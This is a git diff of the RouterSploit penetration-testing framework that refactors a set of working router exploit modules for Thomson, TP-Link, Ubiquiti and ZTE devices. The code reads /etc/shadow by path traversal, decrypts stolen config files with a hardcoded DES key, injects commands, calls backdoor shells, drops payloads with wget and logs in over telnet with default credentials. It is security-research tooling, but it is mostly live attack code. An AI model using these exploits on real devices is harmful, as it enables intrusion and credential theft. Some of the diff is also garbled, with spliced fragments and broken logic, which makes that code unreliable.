'http://modem-help.forum-phpbb.co.uk/t1-fixing-username-password-problems', - 'http://modem-help.forum-phpbb.co.uk/t2-howto-root-tg784', + "references": [ + "http://modem-help.forum-phpbb.co.uk/t1-fixing-username-password-problems", + "http://modem-help.forum-phpbb.co.uk/t2-howto-root-tg784", ], - 'devices': [ - 'Technicolor TG784n-v3', - 'Unknown number of Technicolor and Thompson routers', + "devices": [ + "Technicolor TG784n-v3", + "Unknown number of Technicolor and Thompson routers", ] } - target = exploits.Option('192.168.0.1', 'Target IP address e.g. 192.168.0.1', validators=validators.ipv4) + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") ftp_port = exploits.Option(21, 'Target FTP port') telnet_port = exploits.Option(23, 'Target Telnet port') @@ -104,7 +90,7 @@ def telnet_login(self): tn.write(self.remote_pass + '\r\n') response = tn.read_until("Login not allowed", 10) tn.close() - except Exception: + except: return "" return response @@ -115,7 +101,7 @@ def is_port_opened(self, port): s.settimeout(3) s.connect((self.target, port)) return True - except Exception: + except: return False finally: s.close() diff --git a/routersploit/modules/exploits/routers/thomson/twg849_info_disclosure.py b/routersploit/modules/exploits/routers/thomson/twg849_info_disclosure.py index 894c718b3..25ea56de6 100644 --- a/routersploit/modules/exploits/routers/thomson/twg849_info_disclosure.py +++ b/routersploit/modules/exploits/routers/thomson/twg849_info_disclosure.py @@ -1,36 +1,25 @@ -from pysnmp.entity.rfc3413.oneliner import cmdgen -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - print_table, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.snmp.snmp_client import SNMPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Thomson TWG849 information disclosure vulnerability. - If the target is vulnerable, it allows read sensitive information. - """ +class Exploit(SNMPClient): __info__ = { - 'name': 'Thomson TWG849 Info Disclosure', - 'description': 'Module exploits Thomson TWG849 information disclosure vulnerability which allows to read sensitive information.', - 'authors': [ - 'Sebastian Perez', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Thomson TWG849 Info Disclosure", + "description": "Module exploits Thomson TWG849 information disclosure vulnerability which allows to read sensitive information.", + "authors": [ + "Sebastian Perez", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://packetstormsecurity.com/files/133631/Thomson-CableHome-Gateway-DWG849-Information-Disclosure.html', + "references": [ + "https://packetstormsecurity.com/files/133631/Thomson-CableHome-Gateway-DWG849-Information-Disclosure.html", ], - 'devices': [ - 'Thomson TWG849', + "devices": [ + "Thomson TWG849", ] } - target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.address) + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(161, "Target SNMP port") oids = { # make, model, software version "model": "1.3.6.1.2.1.1.1.0", @@ -50,20 +39,12 @@ class Exploit(exploits.Exploit): def run(self): res = [] - cmdGen = cmdgen.CommandGenerator() print_status("Reading parameters...") for name in self.oids.keys(): - errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( - cmdgen.CommunityData("private"), - cmdgen.UdpTransportTarget((self.target, 161)), - self.oids[name], - ) - - if errorIndication or errorStatus: - continue - - value = str(varBinds[0][1]) - res.append((name, value)) + snmp = self.snmp_get("private", self.oids[name]) + if snmp: + value = str(varBinds[0][1]) + res.append((name, value)) if res: print_success("Exploit success") @@ -73,14 +54,8 @@ def run(self): @mute def check(self): - cmdGen = cmdgen.CommandGenerator() - errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( - cmdgen.CommunityData("private"), - cmdgen.UdpTransportTarget((self.target, 161)), - '1.3.6.1.2.1.1.1.0', - ) + snmp = self.snmp_get("private", "1.3.6.1.2.1.1.1.0") + if snmp: + return True # target is not vulnerable - if errorIndication or errorStatus: - return False # target is not vulnerable - else: - return True # target is vulnerable + return False # target is vulnerable diff --git a/routersploit/modules/exploits/routers/thomson/twg850_password_disclosure.py b/routersploit/modules/exploits/routers/thomson/twg850_password_disclosure.py index 9e990a47f..e9a2344c0 100644 --- a/routersploit/modules/exploits/routers/thomson/twg850_password_disclosure.py +++ b/routersploit/modules/exploits/routers/thomson/twg850_password_disclosure.py @@ -1,42 +1,32 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - print_status, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Thomson TWG850 password disclosure vulnerability. - If the target is vulnerable, it allows read credentials for administration user. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'Thomson TWG850 Password Disclosure', - 'description': 'Module exploits Thomson TWG850 password disclosure vulnerability which allows fetching administration\'s password.', - 'authors': [ - 'Sebastian Perez', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Thomson TWG850 Password Disclosure", + "description": "Module exploits Thomson TWG850 password disclosure vulnerability which allows fetching administration's password.", + "authors": [ + "Sebastian Perez", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://packetstormsecurity.com/files/136135/Thomson-Router-TWG850-4U-XSS-CSRF-Unauthenticated-Access.html', + "references": [ + "https://packetstormsecurity.com/files/136135/Thomson-Router-TWG850-4U-XSS-CSRF-Unauthenticated-Access.html", ], - 'devices': [ - 'Thomson TWG850', + "devices": [ + "Thomson TWG850", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): - url = "{}:{}/GatewaySettings.bin".format(self.target, self.port) + response = self.http_request( + method="GET", + path="/GatewaySettings.bin", + ) - response = http_request(method="GET", url=url) if response is None: return @@ -49,13 +39,15 @@ def run(self): @mute def check(self): - url = "{}:{}/GatewaySettings.bin".format(self.target, self.port) + response = self.http_request( + method="GET", + path="/GatewaySettings.bin", + ) - response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable if response.status_code == 200 and "0MLog" in response.text: return True # target is vulnerable - else: - return False # target is not vulnerable + + return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/tplink/archer_c2_c20i_rce.py b/routersploit/modules/exploits/routers/tplink/archer_c2_c20i_rce.py index 6674fa10b..dec1f0658 100644 --- a/routersploit/modules/exploits/routers/tplink/archer_c2_c20i_rce.py +++ b/routersploit/modules/exploits/routers/tplink/archer_c2_c20i_rce.py @@ -1,40 +1,28 @@ import time +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - http_request, - mute, - validators, - shell, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for TP-Link Archer C2 and Archer C20i remote code execution vulnerability. - If the target is vulnerable it allows to execute commands on operating system level with root privileges. - """ + +class Exploit(HTTPClient): __info__ = { - 'name': 'TP-Link Archer C2 & C20i', - 'description': 'Exploits TP-Link Archer C2 and Archer C20i remote code execution vulnerability that allows executing commands on operating system level with root privileges.', - 'authors': [ - 'Michal Sajdak ', # routersploit module - ], - 'references': [ - 'http://sekurak.pl/tp-link-root-bez-uwierzytelnienia-urzadzenia-archer-c20i-oraz-c2/', # only in polish - ], - 'devices': [ - 'TP-Link Archer C2', - 'TP-Link Archer C20i', - ], + "name": "TP-Link Archer C2 & C20i", + "description": "Exploits TP-Link Archer C2 and Archer C20i remote code execution vulnerability " + "that allows executing commands on operating system level with root privileges.", + "authors": ( + "Michal Sajdak ", # routersploit module + ), + "references": ( + "http://sekurak.pl/tp-link-root-bez-uwierzytelnienia-urzadzenia-archer-c20i-oraz-c2/", # only in polish + ), + "devices": ( + "TP-Link Archer C2", + "TP-Link Archer C20i", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -43,19 +31,17 @@ def run(self): print_status("It is blind command injection so response is not available") # requires testing - shell(self, - architecture="mipsbe", - method="wget", - location="/tmp") + shell(self, architecture="mipsbe", method="wget", location="/tmp") else: print_error("Exploit failed - target seems to be not vulnerable") def execute(self, cmd): - url = "{}:{}/cgi?2".format(self.target, self.port) referer = "{}/mainFrame.htm".format(self.target) - headers = {"Content-Type": "text/plain", - "Referer": referer} + headers = { + "Content-Type": "text/plain", + "Referer": referer + } data = ("[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\n" "dataBlockSize=64\r\n" @@ -66,34 +52,50 @@ def execute(self, cmd): "diagnosticsState=Requested\r\n") # send command - http_request(method="POST", url=url, headers=headers, data=data) + self.http_request( + method="POST", + path="/cgi?2", + headers=headers, + data=data + ) - url = "{}:{}/cgi?7".format(self.target, self.port) data = ("[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n") # execute command on device - http_request(method="POST", url=url, headers=headers, data=data) + self.http_request( + method="POST", + path="/cgi?7", + headers=headers, + data=data + ) time.sleep(1) return "" @mute def check(self): - url = "{}:{}/cgi?2".format(self.target, self.port) - referer = "{}/mainFrame.htm".format(self.target) - - headers = {"Content-Type": "text/plain", - "Referer": referer} - - data = ("[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\n" - "dataBlockSize=64\r\n" - "timeout=1\r\n" - "numberOfRepetitions=1\r\n" - "host=127.0.0.1\r\n" - "X_TP_ConnName=ewan_ipoe_s\r\n" - "diagnosticsState=Requested\r\n") - - response = http_request(method="POST", url=url, headers=headers, data=data) + referer = self.get_target_url(path="/mainFrame.htm") + headers = { + "Content-Type": "text/plain", + "Referer": referer + } + + data = ( + "[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\n" + "dataBlockSize=64\r\n" + "timeout=1\r\n" + "numberOfRepetitions=1\r\n" + "host=127.0.0.1\r\n" + "X_TP_ConnName=ewan_ipoe_s\r\n" + "diagnosticsState=Requested\r\n" + ) + + response = self.http_request( + method="POST", + path="/cgi?2", + headers=headers, + data=data + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/tplink/wdr740nd_wdr740n_backdoor.py b/routersploit/modules/exploits/routers/tplink/wdr740nd_wdr740n_backdoor.py index 09a8df46f..61ada58f0 100644 --- a/routersploit/modules/exploits/routers/tplink/wdr740nd_wdr740n_backdoor.py +++ b/routersploit/modules/exploits/routers/tplink/wdr740nd_wdr740n_backdoor.py @@ -1,46 +1,32 @@ import re +from urllib.parse import quote +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from urllib import quote -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - http_request, - mute, - validators, - shell, - random_text, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for TP-Link WDR740ND and WDR740N backdoor vulnerability. - If the target is vulnerable it allows to execute commands on operating system level. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'TP-Link WDR740ND & WDR740N Backdoor RCE', - 'description': 'Exploits TP-Link WDR740ND and WDR740N backdoor vulnerability that allows executing commands on operating system level.', - 'authors': [ - 'websec.ca', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'http://websec.ca/advisories/view/root-shell-tplink-wdr740', - ], - 'devices': [ - 'TP-Link WDR740ND', - 'TP-Link WDR740N', - ], + "name": "TP-Link WDR740ND & WDR740N Backdoor RCE", + "description": "Exploits TP-Link WDR740ND and WDR740N backdoor vulnerability that allows " + "executing commands on operating system level.", + "authors": ( + "websec.ca", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "http://websec.ca/advisories/view/root-shell-tplink-wdr740", + ), + "devices": ( + "TP-Link WDR740ND", + "TP-Link WDR740N", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - username = exploits.Option('admin', 'Username to log in with') - password = exploits.Option('admin', 'Password to log in with') + username = OptString("admin", "Username to log in with") + password = OptString("admin", "Password to log in with") def run(self): if self.check(): @@ -53,9 +39,13 @@ def run(self): def execute(self, cmd): cmd = quote(cmd) - url = "{}:{}/userRpm/DebugResultRpm.htm?cmd={}&usr=osteam&passwd=5up".format(self.target, self.port, cmd) + path = "/userRpm/DebugResultRpm.htm?cmd={}&usr=osteam&passwd=5up".format(cmd) - response = http_request(method="GET", url=url, auth=(self.username, self.password)) + response = self.http_request( + method="GET", + path=path, + auth=(self.username, self.password) + ) if response is None: return "" @@ -65,13 +55,13 @@ def execute(self, cmd): if len(res): # hard to extract response - return "\n".join(res[0].replace("\\r\\n", "\r\n").split("\n")[1:]) + return "\n".join(res[0].replace("\\r\\n", "\r\n").split("\n")) return "" @mute def check(self): - marker = random_text(32) + marker = utils.random_text(32) cmd = "echo {}".format(marker) response = self.execute(cmd) diff --git a/routersploit/modules/exploits/routers/tplink/wdr740nd_wdr740n_path_traversal.py b/routersploit/modules/exploits/routers/tplink/wdr740nd_wdr740n_path_traversal.py index 17582fbc2..6aa49d25a 100644 --- a/routersploit/modules/exploits/routers/tplink/wdr740nd_wdr740n_path_traversal.py +++ b/routersploit/modules/exploits/routers/tplink/wdr740nd_wdr740n_path_traversal.py @@ -1,49 +1,40 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for TP-Link WDR740ND and WDR740N path traversal vulnerability. - If the target is vulnerable it allows to read files from the filesystem. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'TP-Link WDR740ND & WDR740N Path Traversal', - 'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability' - 'that allowsto read files from the filesystem.', - 'authors': [ - 'websec.ca', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'http://www.websec.mx/publicacion/advisories/tplink-wdr740-path-traversal', - ], - 'devices': [ - 'TP-Link WDR740ND', - 'TP-Link WDR740N', - ], + "name": "TP-Link WDR740ND & WDR740N Path Traversal", + "description": "Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability" + "that allowsto read files from the filesystem.", + "authors": ( + "websec.ca", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "http://www.websec.mx/publicacion/advisories/tplink-wdr740-path-traversal", + ), + "devices": ( + "TP-Link WDR740ND", + "TP-Link WDR740N", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - filename = exploits.Option('/etc/shadow', 'File to read from the filesystem') + filename = OptString("/etc/shadow", "File to read from the filesystem") def run(self): if self.check(): print_success("Target is vulnerable") - url = "{}:{}/help/../../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename) + path = "/help/../../../../../../../../../../../../../../../..{}".format(self.filename) print_status("Sending payload request") - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: return @@ -62,13 +53,16 @@ def run(self): @mute def check(self): - url = "{}:{}/help/../../../../../../../../../../../../../../../../etc/shadow".format(self.target, self.port) + path = "/help/../../../../../../../../../../../../../../../../etc/shadow" - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: return False # target is not vulnerable - if "Admin:" in response.text: + if utils.detect_file_content(response.text, "/etc/shadow"): return True # target is vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure.py b/routersploit/modules/exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure.py index a2ce33809..dff6cb80b 100644 --- a/routersploit/modules/exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure.py +++ b/routersploit/modules/exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure.py @@ -1,48 +1,39 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - http_request, - mute, - validators, -) - from Crypto.Cipher import DES +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for TP-Link WDR842ND configure disclosure vulnerability. - If the target is vulnerable, it allows we fetch authKey,pskSecret,and . - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'TP-Link WDR842ND configure Disclosure', - 'description': 'Module exploits TP-Link WDR842ND configure disclosure vulnerability which allows fetching configure.', - 'authors': [ - 'qingdaoxiaoge ', # vulnerability discovery - 'VegetableCat ', # routersploit module - ], - 'references': [ - 'http://cb.drops.wiki/bugs/wooyun-2015-0110062.html', - ], - 'devices': [ - 'TP-Link WDR842ND', - ] + "name": "TP-Link WDR842ND configure Disclosure", + "description": "Module exploits TP-Link WDR842ND configure " + "disclosure vulnerability which allows fetching configure.", + "authors": ( + "qingdaoxiaoge ", # vulnerability discovery + "VegetableCat ", # routersploit module + ), + "references": ( + "http://cb.drops.wiki/bugs/wooyun-2015-0110062.html", + ), + "devices": ( + "TP-Link WDR842ND", + ) } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', - validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def decrypt_authKey(self, authKey): - matrix = [[0 for i in xrange(15)] for i in range(15)] + matrix = [[0 for _ in xrange(15)] for _ in range(15)] passwdLen = 0 strDe = "RDpbLfCPsJZ7fiv" - dic = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW" + dic = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD" \ + "02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV5" \ + "7fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oB" \ + "wmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW" + passwd = '' for crIndex in xrange(0, 15): - passwdList = '' strComp_authkey = authKey[crIndex] codeCr = ord(strDe[crIndex]) @@ -65,9 +56,9 @@ def decrypt_authKey(self, authKey): return passwd def parse(self, data): - length = data.split('\r\n') - del length[0] - for item in length: + l = data.split(b'\r\n') + del l[0] + for item in l: try: if 'authKey' in item: authKey = item.split()[1] @@ -75,12 +66,12 @@ def parse(self, data): cPskSecret = item.split()[1] if 'cUsrPIN' in item: cUsrPIN = item.split()[1] - except Exception: + except: pass return authKey, cPskSecret, cUsrPIN def decrypt_config_bin(self, data): - key = '\x47\x8D\xA5\x0B\xF9\xE3\xD2\xCF' + key = b"\x47\x8D\xA5\x0B\xF9\xE3\xD2\xCF" crypto = DES.new(key, DES.MODE_ECB) data_decrypted = crypto.decrypt(data).rstrip('\0') authKey, cPskSecret, cUsrPIN = self.parse(data_decrypted) @@ -90,10 +81,13 @@ def decrypt_config_bin(self, data): def run(self): if self.check(): print_success("Target is vulnerable") - url = "{}:{}/config.bin".format(self.target, self.port) print_status("Sending payload request") - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/config.bin", + ) + return None if response is not None and response.status_code == 200: print_success("Exploit success") @@ -110,9 +104,10 @@ def run(self): @mute def check(self): - url = "{}:{}/config.bin".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/config.bin", + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/ubiquiti/airos_6_x.py b/routersploit/modules/exploits/routers/ubiquiti/airos_6_x.py index c9528a431..1d3cfcabd 100644 --- a/routersploit/modules/exploits/routers/ubiquiti/airos_6_x.py +++ b/routersploit/modules/exploits/routers/ubiquiti/airos_6_x.py @@ -1,45 +1,34 @@ import tempfile -import StringIO +from io import StringIO import paramiko +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient +from routersploit.core.ssh.ssh_client import SSHClient -from routersploit import ( - exploits, - print_success, - print_error, - random_text, - http_request, - mute, - validators, - ssh_interactive, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for AirOS 6.x - Arbitrary File Upload. - If the target is vulnerable is possible to take full control of the router - """ +class Exploit(HTTPClient, SSHClient): __info__ = { 'name': 'AirOS 6.x - Arbitrary File Upload', 'description': 'Exploit implementation for AirOS 6.x - Arbitrary File Upload. ' 'If the target is vulnerable is possible to take full control of the router', - 'authors': [ + 'authors': ( '93c08539', # Vulnerability discovery 'Vinicius Henrique Marangoni' # routersploit module - ], - 'references': [ + ), + 'references': ( 'https://hackerone.com/reports/73480', 'https://www.exploit-db.com/exploits/39701/' - ], - 'devices': [ + ), + 'devices': ( 'AirOS 6.x' - ] + ) } - target = exploits.Option('', 'Target address e.g. https://192.168.1.1', validators=validators.url) # Target address - port = exploits.Option(443, 'Target port e.g. 443', validators=validators.integer) # Default port - ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.integer) # target ssh port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + ssl = OptBool("true", "SSL enabled: true/false") + + ssh_port = OptPort(22, "Target SSH Port") def run(self): if self.check(): @@ -87,23 +76,27 @@ def run(self): @mute def check(self): - base_url = '{}:{}/' .format(self.target, self.port) - - upload_url = base_url + 'login.cgi' - response = http_request(url=upload_url, method='GET') + response = self.http_request( + method="GET", + path="/login.cgi" + ) if response is None: return False # Target not vulnerable - rand_str = random_text(length=16) + rand_str = utils.random_text(length=16) tmp_payload = tempfile.TemporaryFile() - tmp_payload.write('vulnerable' + rand_str) + tmp_payload.write("vulnerable{}".format(rand_str).encode()) tmp_payload.seek(0) upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})} - response = http_request(url=upload_url, method='POST', files=upload_params) + response = self.http_request( + method="GET", + path="/login.cgi", + files=upload_params + ) tmp_payload.close() @@ -112,7 +105,10 @@ def check(self): # Response to verify if the upload was done correctly airview_url = base_url + 'airview.uavr' - verify_upload = http_request(url=airview_url, method='GET') + verify_upload = self.http_request( + method="GET", + path="airview.uavr" + ) # Upload empty file to "clear" the airview.uavr file clean_tmp_file = tempfile.TemporaryFile() @@ -120,7 +116,12 @@ def check(self): upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})} - http_request(url=upload_url, method='POST', files=upload_params) + self.http_request( + method="POST", + path="/login.cgi", + files=upload_params + ) + clean_tmp_file.close() if "".join(('vulnerable', rand_str)) in verify_upload.text: diff --git a/routersploit/modules/exploits/routers/zte/f460_f660_backdoor.py b/routersploit/modules/exploits/routers/zte/f460_f660_backdoor.py index 2b7397d89..3b1974428 100644 --- a/routersploit/modules/exploits/routers/zte/f460_f660_backdoor.py +++ b/routersploit/modules/exploits/routers/zte/f460_f660_backdoor.py @@ -1,70 +1,52 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - http_request, - mute, - validators, - random_text, - print_error, - print_success, - print_status, - print_info -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for ZTE F460 and F660 Backdoor vulnerability. - If the target is vulnerable it allows to execute commands on operating system level. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'ZTE F460 & F660 Backdoor RCE', - 'description': 'Exploits ZTE F460 and F660 backdoor vulnerability that allows executing commands on operating system level.', - 'authors': [ - 'Rapid7', # vulnerabilty discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://community.rapid7.com/community/infosec/blog/2014/03/04/disclosure-r7-2013-18-zte-f460-and-zte-f660-webshellcmdgch-backdoor', - ], - 'devices': [ - 'ZTE F460', - 'ZTE F660', - ], + "name": "ZTE F460 & F660 Backdoor RCE", + "description": "Exploits ZTE F460 and F660 backdoor vulnerability that allows " + "executing commands on operating system level.", + "authors": ( + "Rapid7", # vulnerabilty discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://community.rapid7.com/community/infosec/blog/2014/03/04/disclosure-r7-2013-18-zte-f460-and-zte-f660-webshellcmdgch-backdoor", + ), + "devices": ( + "ZTE F460", + "ZTE F660", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop") - self.command_loop() + shell(self) else: print_error("Exploit failed - target seems to be not vulnerable") - def command_loop(self): - while 1: - cmd = raw_input("cmd > ") - - if cmd in ['exit', 'quit']: - return - - print_info(self.execute(cmd)) - def execute(self, cmd): - url = "{}:{}/web_shell_cmd.gch".format(self.target, self.port) - headers = {u'Content-Type': u'multipart/form-data'} - data = {'IF_ACTION': 'apply', - 'IF_ERRORSTR': 'SUCC', - 'IF_ERRORPARAM': 'SUCC', - 'IF_ERRORTYPE': '-1', - 'Cmd': cmd, - 'CmdAck': ''} - - response = http_request(method="POST", url=url, headers=headers, data=data) + data = { + "IF_ACTION": "apply", + "IF_ERRORSTR": "SUCC", + "IF_ERRORPARAM": "SUCC", + "IF_ERRORTYPE": "-1", + "Cmd": cmd, + "CmdAck": "" + } + + response = self.http_request( + method="POST", + path="/web_shell_cmd.gch", + data=data + ) if response is None: return "" @@ -79,7 +61,7 @@ def execute(self, cmd): @mute def check(self): - marker = random_text(32) + marker = utils.random_text(32) cmd = "echo {}".format(marker) response = self.execute(cmd) diff --git a/routersploit/modules/exploits/routers/zte/f609_config_disclosure.py b/routersploit/modules/exploits/routers/zte/f609_config_disclosure.py deleted file mode 100644 index 6705760ac..000000000 --- a/routersploit/modules/exploits/routers/zte/f609_config_disclosure.py +++ /dev/null @@ -1,87 +0,0 @@ -import telnetlib - -from routersploit import ( - exploits, - print_status, - print_success, - print_error, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for ZTE F609 Config Disclosure. - If the target is vulnerable it is possible to authenticate to the device" - """ - __info__ = { - 'name': 'ZTE F609 Config Disclosure', - 'description': 'Module exploits ZTE F609 Config Disclosure.' - 'If the target is possible to authentiate to the device.', - 'authors': [ - 'devilscream', # routersploit module - ], - 'references': [ - 'https://www.youtube.com/watch?v=YlUqPbhzJLk', - ], - 'devices': [ - 'ZTE ZXHN F609', - ] - } - - target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4) # target address - telnet_port = exploits.Option(23, 'Target Telnet port', validators=validators.integer) # target telnet port - - username = exploits.Option("root", "Username to authenticate with") # telnet username, default root - password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521 - config = "sendcmd 1 DB p DevAuthInfo" - - def run(self): - try: - print_status("Trying to authenticate to the telnet server") - tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) - tn.expect(["Login: ", "login: "], 5) - tn.write(self.username + "\r\n") - tn.expect(["Password: ", "password"], 5) - tn.write(self.password + "\r\n") - - (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) - - if i != -1: - print_error("Exploit failed") - else: - if any(map(lambda x: x in res, ["#", "$", ">"])): - print_success("Authentication successful") - print_status("Displaying configuration:") - tn.write(self.config + "\r\n") - tn.interact() - else: - print_error("Exploit failed") - - tn.close() - except Exception: - print_error("Connection error: {}:{}".format(self.target, self.telnet_port)) - - @mute - def check(self): - try: - tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) - tn.expect(["Login: ", "login: "], 5) - tn.write(self.username + "\r\n") - tn.expect(["Password: ", "password"], 5) - tn.write(self.password + "\r\n") - tn.write(self.config + "\r\n") - - (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) - tn.close() - - if i != -1: - return False # target is not vulnerable - else: - if ""])): - print_success("Authentication successful") - print_status("Displaying configuration file:") - tn.write(self.config + "\r\n") - tn.interact() - else: - print_error("Exploit failed") - - tn.close() - except Exception: - print_error("Connection error: {}:{}".format(self.target, 23)) - - @mute - def check(self): - try: - tn = telnetlib.Telnet(self.target, 23, timeout=10) - tn.expect(["Login: ", "login: "], 5) - tn.write(self.username + "\r\n") - tn.expect(["Password: ", "password"], 5) - tn.write(self.password + "\r\n") - tn.write(self.config + "\r\n") - - (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) - tn.close() - - if i != -1: - return False # target is not vulnerable - else: - if any(map(lambda x: x in res, [""])): - print_success("Authentication successful") - tn.write("\r\n") - tn.interact() - else: - print_error("Exploit failed") - - tn.close() - except Exception: - print_error("Connection error {}:{}".format(self.target, self.telnet_port)) - - @mute - def check(self): - try: - tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) - tn.expect(["Login: ", "login: "], 5) - tn.write(self.username + "\r\n") - tn.expect(["Password: ", "password"], 5) - tn.write(self.password + "\r\n") - tn.write("\r\n") - - (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) - tn.close() - - if i != -1: - return False # target is not vulnerable - else: - if any(map(lambda x: x in res, ["#", "$", ">"])): - return True # target is vulnerable - except Exception: - return False # target is not vulnerable - - return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/zte/zxv10_rce.py 